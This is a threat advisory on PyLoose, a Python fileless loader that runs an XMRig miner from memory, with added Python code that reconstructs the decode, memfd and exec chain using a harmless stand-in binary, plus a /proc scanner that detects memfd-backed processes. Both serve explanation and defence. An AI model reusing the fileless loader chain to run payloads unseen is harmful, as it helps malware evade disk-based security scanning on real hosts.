Threat Advisory

PyLoose: Unveiling a New Python-Based Fileless Attack Targeting Cloud Workloads

Threat: Malware
Criticality: High

Summary:

A new fileless attack, named PyLoose, has been discovered targeting cloud workloads. PyLoose is a short Python script that carries a compressed and encoded precompiled XMRig miner. The script decodes and decompresses the miner and loads it directly into memory using memfd, a known Linux fileless technique: the memfd_create system call produces an anonymous file that exists only in RAM, and the payload is executed from that file without ever being written to disk. This is the first reported Python-based fileless attack targeting cloud workloads, and around 200 instances have been observed being used for cryptomining. The attack is named PyLoose after the URL that hosted the Python loader. Fileless attacks against cloud workloads are rare and evasive, because they bypass traditional security solutions by abusing operating system capabilities rather than dropping a file that can be scanned.

In the observed incident the victim ran a publicly accessible Jupyter Notebook service that allowed unrestricted execution of system commands. The attacker used it to download the Python loader from a Pastebin-equivalent paste site and run it without saving it to disk. The script decoded and decompressed the embedded XMRig miner, wrote it to an anonymous RAM-backed file created with memfd, and executed it from there. The miner then connected to a Monero mining pool.
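The loader chain described above, reconstructed as an added example; this is not the PyLoose script itself nor any Wiz code. It assumes the packing was zlib plus base64 (the page only says "compressed and encoded"), uses Python's own os.memfd_create (Linux, Python 3.8+) rather than whatever call the real script made, and substitutes the local /bin/true for the miner so it can be run safely. All function names are mine.

```python
from __future__ import annotations

import base64
import os
import subprocess
import zlib

# Stand-in for the embedded XMRig ELF: a benign local binary
# (assumption: /bin/true exists, as it does on practically every Linux host).
STAND_IN_BINARY = "/bin/true"


def pack_payload(elf_bytes: bytes) -> str:
    """Packing step the loader's author runs once: zlib, then base64
    (assumed format). The result is the long string literal carried
    inside the Python script."""
    return base64.b64encode(zlib.compress(elf_bytes)).decode("ascii")


def unpack_payload(blob: str) -> bytes:
    """Loader side: reverse the packing to recover the raw ELF bytes."""
    return zlib.decompress(base64.b64decode(blob))


def write_to_memfd(elf_bytes: bytes, name: str = "") -> int:
    """Place the ELF in an anonymous, RAM-backed file. No path on any
    mounted filesystem is created; the only handle is the descriptor.
    An empty name makes the kernel report it as '/memfd: (deleted)'."""
    fd = os.memfd_create(name, 0)  # flags=0: leave the fd inheritable
    os.write(fd, elf_bytes)
    return fd


def exec_from_memfd(fd: int, argv: list[str]) -> int:
    """Execute the in-memory file through its /proc/self/fd alias and
    return the exit status. pass_fds keeps the descriptor open in the
    child so the /proc path still resolves when execve runs."""
    return subprocess.run(
        argv, executable=f"/proc/self/fd/{fd}", pass_fds=[fd]
    ).returncode


def run_packed(blob: str, argv: list[str]) -> int:
    """The whole PyLoose-style chain: decode, decompress, memfd, exec."""
    fd = write_to_memfd(unpack_payload(blob))
    try:
        return exec_from_memfd(fd, argv)
    finally:
        os.close(fd)


def demo() -> int | None:
    """Run the chain with the benign stand-in. Returns the exit status, or
    None where the host cannot do it (non-Linux, no memfd_create, or an
    execution policy that refuses memfd-backed files)."""
    if not hasattr(os, "memfd_create") or not os.path.exists(STAND_IN_BINARY):
        return None
    with open(STAND_IN_BINARY, "rb") as f:
        blob = pack_payload(f.read())
    try:
        return run_packed(blob, ["true"])
    except OSError:
        return None


if __name__ == "__main__":
    print("exit status:", demo())
```

execve opens the /proc/self/fd path itself, so the kernel reads the ELF from the anonymous file; nothing is written under any mounted filesystem, and the bytes disappear when the last reference to the memfd is dropped. Swapping a miner for /bin/true changes nothing about the mechanics.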

Fileless attacks are harder to detect and investigate than disk-based attacks. With memfd the payload is executed without ever being written to disk, so security solutions that rely on scanning binaries on the filesystem have nothing to scan, and once the process exits the anonymous file is gone, leaving little for forensic analysis. The attacker demonstrated sophistication by adapting fileless execution to Python and by hosting the loader on an open data-sharing service. Attribution to a specific threat actor is difficult. Preventive measures include not exposing services like Jupyter Notebook to the public internet, requiring strong authentication, and restricting the execution of system commands from such services. Wiz provides risk management through host configuration scanning and threat detection through the Runtime Sensor, which can detect fileless threats like PyLoose throughout the attack chain.
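What a host-side check for this technique keys on, as an added example; this is not code from the page, from Wiz, or from the Runtime Sensor. It relies only on the /proc layout: a process whose executable or a mapped object is an anonymous memfd shows the path "/memfd:<name> (deleted)" in /proc/<pid>/exe and /proc/<pid>/maps. The sample records and the function names are mine.

```python
from __future__ import annotations

import os
import re
from typing import List, NamedTuple, Optional, Tuple

# The kernel reports an anonymous memfd as '/memfd:<name> (deleted)'; the
# name is whatever the loader passed to memfd_create and may be empty.
MEMFD_PATH = re.compile(r"^/memfd:.*\(deleted\)$")


class ProcInfo(NamedTuple):
    pid: int
    exe: str            # target of /proc/<pid>/exe
    cmdline: str        # argv with NULs replaced by spaces
    mapped: List[str]   # distinct path columns from /proc/<pid>/maps


# Constructed sample, not captured from a real host: what read_proc() would
# return for a memfd-loaded binary and for an ordinary interpreter.
SAMPLE_MEMFD = ProcInfo(4242, "/memfd: (deleted)", "true",
                        ["/memfd: (deleted)", "/usr/lib/x86_64-linux-gnu/libc.so.6"])
SAMPLE_BENIGN = ProcInfo(1000, "/usr/bin/python3", "python3 app.py",
                         ["/usr/bin/python3", "/usr/lib/x86_64-linux-gnu/libc.so.6"])


def is_memfd_path(path: str) -> bool:
    return bool(MEMFD_PATH.match(path))


def findings(p: ProcInfo) -> List[str]:
    """Reasons a process looks like a memfd-loaded payload. An empty list
    means nothing fileless was seen."""
    reasons = []
    if is_memfd_path(p.exe):
        reasons.append("main executable is memfd-backed (no file on disk)")
    if any(is_memfd_path(m) for m in p.mapped):
        reasons.append("memfd-backed object mapped into the process")
    return reasons


def read_proc(pid: int, proc_root: str = "/proc") -> Optional[ProcInfo]:
    """Collect the artefacts for one pid; None if the process is gone, is a
    kernel thread, or is not readable (other users' processes need root)."""
    base = f"{proc_root}/{pid}"
    try:
        exe = os.readlink(f"{base}/exe")
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        mapped: List[str] = []
        with open(f"{base}/maps") as f:
            for line in f:
                # addr perms offset dev inode [path]; the path may contain
                # spaces (" (deleted)"), so split at most five times.
                cols = line.split(None, 5)
                if len(cols) == 6 and cols[5].strip() not in mapped:
                    mapped.append(cols[5].strip())
    except OSError:
        return None
    return ProcInfo(pid, exe, cmdline, mapped)


def scan(proc_root: str = "/proc") -> List[Tuple[ProcInfo, List[str]]]:
    """Point-in-time sweep of every readable process."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        info = read_proc(int(entry), proc_root)
        if info is None:
            continue
        why = findings(info)
        if why:
            hits.append((info, why))
    return hits


if __name__ == "__main__":
    for info, why in scan():
        print(f"pid {info.pid}: exe={info.exe!r} cmd={info.cmdline!r}")
        for reason in why:
            print("   -", reason)
```

A sweep like this races with short-lived processes and only sees what is running at that instant; the reliable place to catch the chain is at the execve of a /proc/<pid>/fd path or at the memfd_create call itself, which is what a runtime sensor hooking the kernel can observe. Legitimate software occasionally uses memfd too (some runtimes and sandboxes), so treat a hit as a lead to be confirmed against the command line and outbound connections rather than as a verdict.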

Threat Profile:

References:

The following reports contain further technical details:

https://thehackernews.com/2023/07/python-based-pyloose-fileless-attack.htm
